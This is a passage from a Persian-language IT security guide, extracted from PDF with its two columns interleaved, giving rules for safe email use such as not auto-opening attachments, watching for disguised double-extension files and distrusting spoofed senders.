‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺁﺧﺮﻳﻦ ﻧﺴﺨﺔ ﻣﻮﺟﻮﺩ ﺁﻥ ﺍﺭﺗﻘﺎ ﺩﻫﻴﺪ‪.‬‬
‫‪64‬‬ ‫‪Clear Text‬‬
‫‪65‬‬ ‫‪Multipurpose Internet Mail Extensions‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٨٠‬‬

‫ﻗﺎﻧﻮﻥ ﭘﻨﺠﻢ‪:‬‬ ‫ﺑﺮﻧﺎﻣﻪ ﻫـﺎﻱ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﺼﻮﺭﺕ ﺧﻮﺩﻛـﺎﺭ ﺩﺳـﺘﻮﺭﺍﺕ‬


‫ﺑﺮﻧﺎﻣﺔ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺭﺍ ﻃﻮﺭﻱ ﭘﻴﻜﺮﺑﻨـﺪﻱ‬ ‫‪ HTML‬ﺩﺭﻭﻥ ﺻﻔﺤﺎﺕ ﺍﺭﺳﺎﻝﺷﺪﻩ ﺭﺍ ﻧﻴﺰ ﺍﺟﺮﺍ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﻧﻤﺎﻳﻴﺪ ﻛﻪ ﺿﻤﺎﺋﻢ ﺭﺍ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺑﺎﺯ ﻧﻜﻨﺪ‪.‬‬
‫ﺗﺄﺛﻴﺮ ﺍﺭﺗﻘﺎﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﻫﺮ ﻓﺮﺩﻱ ﻛﻪ ﺁﺩﺭﺱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺷﻤﺎ ﺭﺍ ﺑﺪﺍﻧﺪ ﻳـﺎ ﺑﺘﻮﺍﻧـﺪ‬
‫ﺍﻓﺰﻭﺩﻩ ﺷﺪﻥ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻬﺎ )ﺍﻣﻜﺎﻧﺎﺕ ﻗﺎﻟـﺐﺑﻨـﺪﻱ( ﺑـﻪ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ‬
‫ﺁﻧﺮﺍ ﺣﺪﺱ ﺑﺰﻧﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻧﺎﻣﺔ ﺣﺎﻭﻱ ﺿﻤﻴﻤﻪ ﺍﺭﺳـﺎﻝ‬
‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﻛﺎﺭﺑﺮﺩ ﺁﻧﻬﺎ ﺭﺍ ﻣﻔﻴﺪﺗﺮ ﺳﺎﺧﺖ‪ .‬ﻛﺎﺭﺑﺮﺍﻥ ﺍﺯ ﺁﻥ‬
‫ﻛﻨﺪ‪ .‬ﺍﻳﻦ ﺿﻤﻴﻤﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻣﻔﻴـﺪ ﻭ ﻗﺎﺑـﻞ ﺍﺳـﺘﻔﺎﺩﻩ ﻭ ﻳـﺎ‬
‫ﭘﺲ ﻣﻲﺗﻮﺍﻧﺴﺘﻨﺪ ﺍﻧﻮﺍﻉ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺑﺴﺎﺩﮔﻲ ﺗﺒﺎﺩﻝ ﻛﻨﻨﺪ‪ .‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﻭﻳﺮﻭﺱ‪ ،‬ﻛﺮﻡ‪ ،‬ﻳﺎ ﺗﺮﺍﻭﺍﻳﻲ ﺑﺎﺷﺪ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﺁﺳـﻴﺒﻬﺎﻱ ﺟـﺪﻱ ﺑـﻪ‬
‫ﺍﺯ ﻓﻮﻧﺖﻫﺎ‪ ،‬ﺭﻧﮕﻬﺎ ﻭ ﺗﺼﺎﻭﻳﺮ‪ ،‬ﻧﺎﻣـﻪ ﺷـﻜﻞ ﻣﻄﻠـﻮﺏﺗـﺮﻱ ﭘﻴـﺪﺍ‬
‫ﺳﻴــﺴﺘﻢ ﺷــﻤﺎ ﻭﺍﺭﺩ ﻧﻤﺎﻳــﺪ‪ .‬ﺍﻛﺜــﺮ ﺑﺮﻧﺎﻣــﻪﻫــﺎﻱ ﺟﺪﻳــﺪ ﭘــﺴﺖ‬
‫ﻣﻲﻛﺮﺩ ﻭ ﻗﺎﻟﺐ ﺑﻨﺪﻱ ﺳﺎﺩﺓ ﺁﻥ ﺑﺪﻭﻥ ﻧﻴﺎﺯ ﺑﻪ ﺑﺮﻧﺎﻣـﺔ ﭘﺮﺩﺍﺯﺷـﮕﺮ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺿﻤﺎﻳﻢ ﺭﺍ ﻗﺒﻞ ﺍﺯ ﺍﺟﺎﺯﺓ ﺷﻤﺎ ﺑﺎﺯ ﻧﻤﻲﻛﻨﻨﺪ‪ ،‬ﺍﻣﺎ ﺍﮔـﺮ‬
‫ﻛﻠﻤﺎﺕ ﺻﻮﺭﺕ ﻣﻲﭘﺬﻳﺮﻓﺖ‪ .‬ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ‪ ،‬ﺍﻳﻦ ﺍﺭﺗﻘﺎ ﺍﺑﻌﺎﺩ ﻣﻨﻔـﻲ‬
‫ﺑﺮﻧﺎﻣﺔ ﺷﻤﺎ ﺑﮕﻮﻧﻪﺍﻱ ﺑﺎﺷﺪ ﻛﻪ ﺁﻧﺮﺍ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺑـﺎﺯ ﻧﻤﺎﻳـﺪ‪،‬‬
‫ﻧﻴﺰ ﺩﺭ ﭘﻲ ﺩﺍﺷﺖ‪.‬‬
‫ﺑﺎﻳﺪ ﺑﺘﻮﺍﻧﻴﺪ ﺍﻳﻦ ﮔﺰﻳﻨﻪ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﻴﺪ‪.‬‬
‫ﻼ ﺫﻛﺮ ﺷﺪ ﺗﺎ ﻗﺒﻞ ﺍﺯ ﺍﻳﺠﺎﺩ ﺍﻳﻦ ﭘﻴﺸﺮﻓﺘﻬﺎ ﻛﺴﻲ‬ ‫ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻗﺒ ﹰ‬
‫ﻗﺎﻧﻮﻥ ﺷﺸﻢ‪:‬‬ ‫ﺍﺯ ﻃﺮﻳﻖ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﺤـﺖ ﺗـﺄﺛﻴﺮ ﻣـﺴﺘﻘﻴﻢ ﻭﻳﺮﻭﺳـﻬﺎ ﻭ‬
‫ﻗﺒﻞ ﺍﺯ ﺑﺎﺯ ﻛﺮﺩﻥ ﻫﺮ ﺿﻤﻴﻤﻪ ﺑﻪ ﻧﺎﻡ ﺁﻥ ﺩﻗﺖ ﻛﻨﻴﺪ ﺗﺎ‬ ‫ﻛﺮﻣﻬﺎ ﻗﺮﺍﺭ ﻧﻤﻲﮔﺮﻓﺖ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﺑﺮﻧﺎﻣﺔ ﺩﺭﻳﺎﻓﺖﺷﺪﺓ‬
‫ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺍﺟﺮﺍﻳﻲ ﻧﻴﺴﺖ‪.‬‬ ‫ﻣﻮﺟﻮﺩ ﺩﺭ ﺿﻤﺎﺋﻢ ﻧﺎﻣﺔ ﺩﺭﻳﺎﻓﺘﻲ ﺭﺍ ﺍﺟﺮﺍ ﻧﻤﻲﻛﺮﺩﻳـﺪ ﺍﺯ ﺧﻄـﺮﺍﺕ‬
‫ﻻ ﺿـﻤﺎﻳﻢ‬ ‫ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻭﻳﺮﻭﺱ ﺑﺴﻴﺎﺭ ﺯﻳﺮﻙ ﻫﺴﺘﻨﺪ‪ .‬ﺁﻧﻬﺎ ﻣﻌﻤﻮ ﹰ‬ ‫ﺍﻣﻨﻴﺘﻲ ﻣﺼﻮﻥ ﺑﻮﺩﻳـﺪ‪ .‬ﺍﻛﻨـﻮﻥ ﺍﻣـﺎ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻳﻲ ﻛـﻪ ﺩﺭﻳﺎﻓـﺖ‬
‫ﺭﺍ ﺑــﺎ ﻧﺎﻣﻬــﺎﻳﻲ ﭼــﻮﻥ ‪ budget.xls.vbs‬ﺍﺭﺳــﺎﻝ ﻣــﻲﻛﻨﻨــﺪ‪.‬‬ ‫ﻣﻲﻛﻨﻴﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻳﻨﺪ ﻛـﻪ ﻣﻔﻬـﻮﻡ‬
‫ﻧﺎﻇﺮﻱ ﻛﻪ ﻧﻤﻲ ﺩﺍﻧﺪ ‪ vbs‬ﭼﻴﺴﺖ ﺗﺼﻮﺭ ﻣـﻲﻛﻨـﺪ ﻳـﻚ ﻓﺎﻳـﻞ‬ ‫ﺁﻥ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫـﺎ ﺧﻮﺍﻫﻨـﺪ ﺗﻮﺍﻧـﺴﺖ ﺷـﻤﺎ ﺭﺍ ﺑـﻪ‬
‫‪ Excel‬ﺑــﺎ ﻧــﺎﻡ ‪ budget‬ﺍﺯ ﺳــﻮﻱ ﻣﺎﻳﻜﺮﻭﺳــﺎﻓﺖ ﺑــﺮﺍﻱ ﻭﻱ‬ ‫ﭘﺎﻳﮕﺎﻩ ﻭﺑـﻲ ﻫـﺪﺍﻳﺖ ﻛﻨﻨـﺪ ﻛـﻪ ﺩﺭ ﺁﻥ ﺍﻋﻤـﺎﻝ ﻣﺨﺮﺑـﻲ ﻣﺜـﻞ‬
‫ﺍﺭﺳﺎﻝ ﺷﺪﻩ )ﺧﺼﻮﺻﹰﺎ ﺩﺭ ﺣﺎﻟﺘﻲ ﺍﺯ ﺗﻨﻈﻴﻤﺎﺕ ﻛﻪ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﭘﺴﻮﻧﺪﻫﺎﻱ‬
‫‪ download‬ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﺻﻮﺭﺕ ﻣﻲﭘﺬﻳﺮﺩ‪ .‬ﻋﻼﻭﻩ ﺑﺮ‬
‫ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﺭﺍ ﺑﻪ ﻛﺎﺭﺑﺮ ﻧﻤﺎﻳﺶ ﻧﻤﻲﺩﻫﺪ(؛ ﺍﻣﺎ ﺍﻳـﻦ ﻓﺎﻳـﻞ ﺩﺭ ﺣﻘﻴﻘـﺖ‬ ‫ﺍﻳﻦ‪ ،‬ﺩﺳﺘﻮﺭﺍﺕ ﻭﻳﮋﺓ ‪ HTML‬ﻣﻲﺗﻮﺍﻧﻨـﺪ ﻣﻬـﺎﺟﻢ ﺭﺍ ﺑـﻪ ﺭﺍﻫﺒـﺮ‬
‫ﻳــﻚ ﺑﺮﻧﺎﻣــﺔ ﺍﺟﺮﺍﻳــﻲ ‪ Visual Basic‬ﺍﺳــﺖ ﻛــﻪ ﻧــﺎﻡ ﺁﻥ‬ ‫ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺗﺒﺪﻳﻞ ﻛﻨﻨـﺪ ﻛـﻪ ﺍﻟﺒﺘـﻪ ﭼﮕـﻮﻧﮕﻲ ﺁﻥ ﺑـﺴﺘﮕﻲ ﺑـﻪ‬
‫‪ budget.xls‬ﻣﻲﺑﺎﺷﺪ‪ xls :‬ﺗﻨﻬﺎ ﺑﺨﺸﻲ ﺍﺯ ﻧﺎﻡ ﺍﻳﻦ ﻓﺎﻳﻞ ﺍﺳﺖ‬ ‫ﺍﺷﻜﺎﻻﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺑﺮﻧﺎﻣـﺔ ﻣﻔـﺴﺮ ﺩﺳـﺘﻮﺭﺍﺕ ‪ HTML‬ﺭﺍﻳﺎﻧـﺔ‬
‫ﻭ ﻫﻴﭻ ﺍﺭﺗﺒﺎﻃﻲ ﺑﺎ ‪ Excel‬ﻧﺪﺍﺭﺩ‪ .‬ﺩﺭ ﺑﺪﺗﺮﻳﻦ ﺣﺎﻻﺕ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ‬ ‫ﺷﻤﺎ ﺩﺍﺭﺩ‪.‬‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺘﻮﺍﻧﺪ ﺗﻤﺎﻣﻲ ﺩﻳﺴﻚ ﺳﺨﺖ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺭﺍ ﭘـﺎﻙ‬
‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﮔﻤﺮﺍﻩﻛﻨﻨﺪﻩ ﺍﺳﺖ‬
‫ﻧﻤﺎﻳﺪ‪.‬‬
‫ﺩﺭ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﻗــﻊ ﺁﺩﺭﺱ ﭘــﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﻛــﻪ ﺟﻠــﻮﻱ‬
‫ﻗﺎﻧﻮﻥ ﻫﻔﺘﻢ‪:‬‬ ‫ﻋﺒﺎﺭﺕ "ﻓﺮﺳﺘﻨﺪﻩ" ﻗﺮﺍﺭ ﻣﻲ ﮔﻴﺮﺩ ﻣﻌﺘﺒﺮ ﻧﻴﺴﺖ‪ .‬ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻲ ﺍﺳﺖ‬
‫ﻫﺮﮔﺰ ﺿﻤﻴﻤﻪ ﺍﻱ ﺭﺍ ﻛـﻪ ﺍﺯ ﺟﺎﻧـﺐ ﺍﻓـﺮﺍﺩ ﻧﺎﺷـﻨﺎﺱ‬ ‫ﻛﻪ ﻫﺮﺯﻧﺎﻣﻪﻧﻮﻳﺲﻫﺎ ﺁﻧﺮﺍ ﺑﺮﺍﻱ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴـﺴﺘﻢ ﺷـﻤﺎ‬
‫ﺑﺮﺍﻳﺘﺎﻥ ﺍﺭﺳﺎﻝ ﺷﺪﻩ ﺍﺳﺖ ﺑﺎﺯ ﻧﻜﻨﻴـﺪ؛ ﻣﮕـﺮ ﺍﻳﻨﻜـﻪ‬ ‫ﺑﻜﺎﺭ ﻣﻲﺑﺮﻧﺪ‪ .‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﮔﺮ ﻛﻞ ﺳﺮﺁﻳﻨﺪ‪ ٦٦‬ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴـﺪ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺁﻥ ﻧﻮﻉ ﻓﺎﻳﻞ ﻧﻤـﻲﺗﻮﺍﻧـﺪ‬ ‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺘﻮﺍﻧﻴﺪ ﻣﺘﻮﺟﻪ ﺷﻮﻳﺪ ﻛﻪ ﺍﻳﻦ ﻧﺎﻣﻪ ﻭﺍﻗﻌﹰﺎ ﺍﺯ ﻛﺠﺎ ﻭ ﺍﺯ‬
‫ﺣﺎﻭﻱ ﻛﺪ ﻣﺨﺮﺏ ﺑﺎﺷﺪ‪.‬‬ ‫ﺳﻮﻱ ﭼﻪ ﻛﺴﻲ ﺍﺭﺳﺎﻝ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬

‫ﺑﻪ ﺧﺎﻃﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﺑﺮﻧﺎﻣﻪﻫـﺎﻳﻲ ﻣﺜـﻞ ‪Microsoft Word‬‬ ‫ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺧﻮﺩ ﻣﺤﺎﻓﻈﺖ ﻧﻤﺎﻳﻴﺪ؟‬
‫)ﭘﺮﺩﺍﺯﺷﮕﺮ ﻛﻠﻤﺎﺕ( ﻭ ‪) Microsoft Excel‬ﺻﻔﺤﻪ ﮔـﺴﺘﺮﺩﺓ ﺩﺍﺩﻩ( ﻭ‬
‫ﺗﻤﺎﻣﻲ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣـﺸﺎﺑﻪ‪ ،‬ﺩﺍﺭﺍﻱ ﻗﺎﺑﻠﻴـﺖ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ‪Macro‬‬
‫ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻲ ﺗﻮﺍﻧﺪ ﺣﺎﻭﻱ ﻭﻳﺮﻭﺱ ﺑﺎﺷﺪ‪ .‬ﺣﺘﻲ ﻓﺎﻳﻠﻬﺎﻱ ‪PDF‬‬
‫ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺣﺎﻭﻱ ﻗﻄﻌﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺨﺮﺏ ﺑﺎﺷﻨﺪ )ﺍﮔﺮﭼﻪ ﺍﻳـﻦ‬
‫‪66‬‬ ‫‪Header‬‬
‫‪٨١‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﻗﺎﻧﻮﻥ ﺩﻫﻢ‪:‬‬ ‫ﻓﺎﻳﻠﻬﺎ ﺗﻨﻬﺎ ﺯﻣﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺧﻄﺮﻧـﺎﻙ ﺑﺎﺷـﻨﺪ ﻛـﻪ ﺑـﺎ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﻛـﺎﺭﺑﺮﺩﻱ‬
‫‪ Adobe Acrobat Professional‬ﺑــﺎﺯ ﺷــﻮﻧﺪ ﻭ ﺑــﺎﺯﻛﺮﺩﻥ ﺁﻧﻬــﺎ ﺑــﺎ‬
‫ﺍﺯ ‪ ISP‬ﺧﻮﺩ ﺳـﺆﺍﻝ ﻛﻨﻴـﺪ ﻛـﻪ ﺁﻳـﺎ ﻗﺒـﻞ ﺍﺯ ﺍﺭﺳـﺎﻝ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﭼﻮﻥ ‪ Adobe Acrobat Reader‬ﻛﻪ ﻛﺎﺭﺑﺮﺩ ﺑﻴﺸﺘﺮﻱ ﻣﻴـﺎﻥ‬
‫ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺁﻧﻬﺎ ﺭﺍ ﺍﺯ ﻧﻈﺮ ﺩﺍﺷﺘﻦ ﻭﻳﺮﻭﺱ‬ ‫ﺍﻓﺮﺍﺩ ﺩﺍﺭﺩ ﺧﻄﺮ ﺧﺎﺻﻲ ﺩﺭ ﭘﻲ ﻧﺨﻮﺍﻫﺪ ﺩﺍﺷﺖ(‪ .‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻫﻨﻤـﺎﻱ‬
‫ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﻣﺸﺎﺑﻪ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ ﻳﺎ ﺧﻴﺮ‪.‬‬ ‫ﻛﺎﺭﺑﺮﻱ ﻭ ﻳﺎ ﺻﻔﺤﺎﺕ ﺭﺍﻫﻨﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻛﻪ ﭼﮕﻮﻧﻪ‬
‫ﺑﻪ ﺩﻟﻴﻞ ﺍﻓﺰﺍﻳﺶ ﺭﻭﺯﺍﻓـﺰﻭﻥ ﻓﻌﺎﻟﻴـﺖ ﻛﺮﻣﻬـﺎ ﻭ ﻭﻳﺮﻭﺳـﻬﺎ ﺍﻛﺜـﺮ‬ ‫ﻣﻲﺗﻮﺍﻥ ﺑﻌﻀﻲ ﻗﺎﺑﻠﻴﺘﻬﺎ )ﺧﺼﻮﺻﹰﺎ ﺁﻧﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺳﻴﺴﺘﻢ ﺑﻨـﺪﺭﺕ ﻣـﻮﺭﺩ‬
‫‪ISP‬ﻫﺎ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ‪ .‬ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ ﻧﺒﺎﻳـﺪ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ( ﺭﺍ ﺍﺯ ﻛﺎﺭ ﺍﻧﺪﺍﺧﺖ‪.‬‬
‫ﺗﻮﻗﻊ ﺩﺍﺷﺖ ﻛﻪ ﻏﺮﺑﺎﻝﺳﺎﺯﻱ ‪ ISP‬ﺷﻤﺎ ﺻﺪ ﺩﺭﺻـﺪ ﺛﻤـﺮﺑﺨﺶ‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﺑﺎﺷﺪ‪ ،‬ﺍﻣﺎ ﻋﻤﻠﻜﺮﺩ ﭘﻴﺸﮕﻴﺮﺍﻧﺔ ‪ISP‬ﻫﺎ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﻪ ﺗﻼﺷـﻬﺎﻱ‬ ‫ﻗﺎﻧﻮﻥ ﻫﺸﺘﻢ‪:‬‬
‫ﺷﻤﺎ ﺩﺭ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻣﻨﻴﺖ ﻛﻤﻚ ﻛﻨﺪ‪ .‬ﺍﮔﺮ ‪ ISP‬ﺷـﻤﺎ ﺍﺯ ﻣـﺴﺎﺋﻞ‬ ‫ﻫﺮﮔﺰ ﺿﻤﺎﺋﻢ ﺍﺭﺳﺎﻟﻲ ﺍﺯ ﺟﺎﻧﺐ ﺍﻓﺮﺍﺩ ﺷﻨﺎﺧﺘﻪﺷـﺪﻩ ﻭ‬
‫ﺍﻣﻨﻴﺘﻲ ﺁﮔﺎﻩ ﻧﻴﺴﺖ ﺑﻬﺘﺮ ﺍﺳﺖ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﺧـﺪﻣﺎﺕ ﺍﻣـﻦﺗـﺮ ﺑـﻪ‬ ‫ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ﺭﺍ ﻧﻴﺰ ﺑﺎﺯ ﻧﻜﻨﻴﺪ؛ ﻣﮕـﺮ ﺍﻳﻨﻜـﻪ ﺍﻃﻤﻴﻨـﺎﻥ‬
‫ﻼ‬
‫ﺧﻮﺩﺗﺎﻥ ﻭ ﻧﻴﺰ ﺩﻳﮕﺮ ﻣﺸﺘﺮﻳﺎﻥ ﺑـﺎ ﺁﻧﻬـﺎ ﻫﻤﻜـﺎﺭﻱ ﻛﻨﻴـﺪ‪ .‬ﻣـﺜ ﹰ‬ ‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻓـﺮﺩ ﻣـﻮﺭﺩ ﻧﻈـﺮ ﺍﻳـﻦ ﺿـﻤﺎﺋﻢ ﺭﺍ‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﻛﺘﺎﺑﻲ ﻛﻪ ﻫﻢ ﺍﻛﻨﻮﻥ ﻣـﺸﻐﻮﻝ ﻣﻄﺎﻟﻌـﻪ‬ ‫ﺑﺮﺭﺳﻲ ﻛﺮﺩﻩ ﻭ ﺑﺎ ﻣﻼﺣﻈـﻪ ﻛﺎﻣـﻞ ﺑﺮﺍﻳﺘـﺎﻥ ﺍﺭﺳـﺎﻝ‬
‫ﺁﻥ ﻫﺴﺘﻴﺪ ﺭﺍ ﺑﺼﻮﺭﺕ ﺭﺍﻳﮕﺎﻥ ﺑﻪ ﺁﻧﻬﺎ ﻫﺪﻳﻪ ﻧﻤﺎﻳﻴﺪ!‬ ‫ﻧﻤﻮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﺍﻣﻜﺎﻥ ﺩﺍﺭﺩ ﻛﻪ ﻣﺎﺷﻴﻦ ﺩﻭﺳﺖ ﺷﻤﺎ ﻭﻳﺮﻭﺳﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ ﻛـﻪ‬
‫ﻫﺮﺯﻧﺎﻣﻪ‬
‫ﺑﺪﻭﻥ ﺍﻃﻼﻉ ﻭﻱ ﻓﺎﻳﻠﻬﺎﻱ ﺁﻟـﻮﺩﻩ ﺭﺍ ﺑـﻪ ﻫﻤـﺔ ﺍﻓـﺮﺍﺩﻱ ﻛـﻪ ﺩﺭ‬
‫ﻫﺮﺯﻧﺎﻣﻪ‪ ٦٩‬ﻧﺎﻣﻲ ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﻧﺎﻣﻪ ﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﺎﺧﻮﺍﺳﺘﻪ‬ ‫ﻓﻬﺮﺳﺖ ﺁﺩﺭﺳﻬﺎﻱ ﻭﻱ ﻫﺴﺘﻨﺪ ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﺪ‪.‬‬
‫ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪ ،‬ﺧﺼﻮﺻﹰﺎ ﻧﺎﻣﻪﻫـﺎﻱ ﺗﺠـﺎﺭﻱ ﻛـﻪ ﺍﺯ ﻃـﺮﻑ ﺍﻓـﺮﺍﺩ‬
‫ﻻ ﺑﺮ ﺍﺳـﺎﺱ ﺍﻳـﻦ ﺑـﺎﻭﺭ ﻛـﻪ‬ ‫ﻧﺎﺷﻨﺎﺱ ﻭ ﺑﺼﻮﺭﺕ ﻣﺘﻌﺪﺩ ‪ -‬ﺍﺣﺘﻤﺎ ﹰ‬ ‫ﻗﺎﻧﻮﻥ ﻧﻬﻢ‪:‬‬
‫ﺩﺭﻳﺎﻓﺖ ﻛﻨﻨﺪﻩ ﺑﻪ ﻣﺤﺼﻮﻻﺕ ﺁﻧﻬـﺎ ﻋﻼﻗـﻪﻣﻨـﺪ ﺧﻮﺍﻫـﺪ ﺷـﺪ ‪-‬‬ ‫ﭘﻴﻜﺮﺑﻨﺪﻱ ﺑﺮﻧﺎﻣﺔ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺭﺍ ﺑﺮﺭﺳﻲ‬
‫ﺍﺭﺳﺎﻝ ﻣﻲ ﺷﻮﻧﺪ‪ .‬ﺩﺭ ﺳـﺎﻟﻬﺎﻱ ﺍﺧﻴـﺮ ﺗﻌـﺪﺍﺩ ﻫﺮﺯﻧﺎﻣـﻪ ﻫـﺎ ﺑﻄـﻮﺭ‬ ‫ﻛﻨﻴﺪ ﺗﺎ ﻓﺎﻳﻠﻬﺎﻱ ‪ HTML‬ﺗﻔﻨﻨﻲ‪ ٦٧‬ﺭﺍ ﭘﺮﺩﺍﺯﺵ ﻧﻜﻨﺪ ﻭ‬
‫ﭼﺸﻤﮕﻴﺮﻱ ﺍﻓﺰﺍﻳﺶ ﻳﺎﻓﺘﻪ ﺍﺳﺖ‪ .‬ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۳‬ﺑـﻴﺶ ﺍﺯ ‪%۵۰‬‬ ‫ﻓﺎﻳﻠﻬﺎﻱ ﺁﻟﻮﺩﻩ ﺭﺍ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺍﺭﺳﺎﻝ ﻧﻨﻤﺎﻳﺪ‪.‬‬
‫ﺍﺯ ﻛﻞ ﻧﺎﻣﻪ ﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﺒﺎﺩﻝﺷـﺪﻩ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﻫﺮﺯﻧﺎﻣـﻪ‬
‫ﺍﻳﻦ ﺑﺪﺍﻥ ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻌﻀﻲ ﺍﺯ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺗﺰﺋﻴﻨﻲ‬
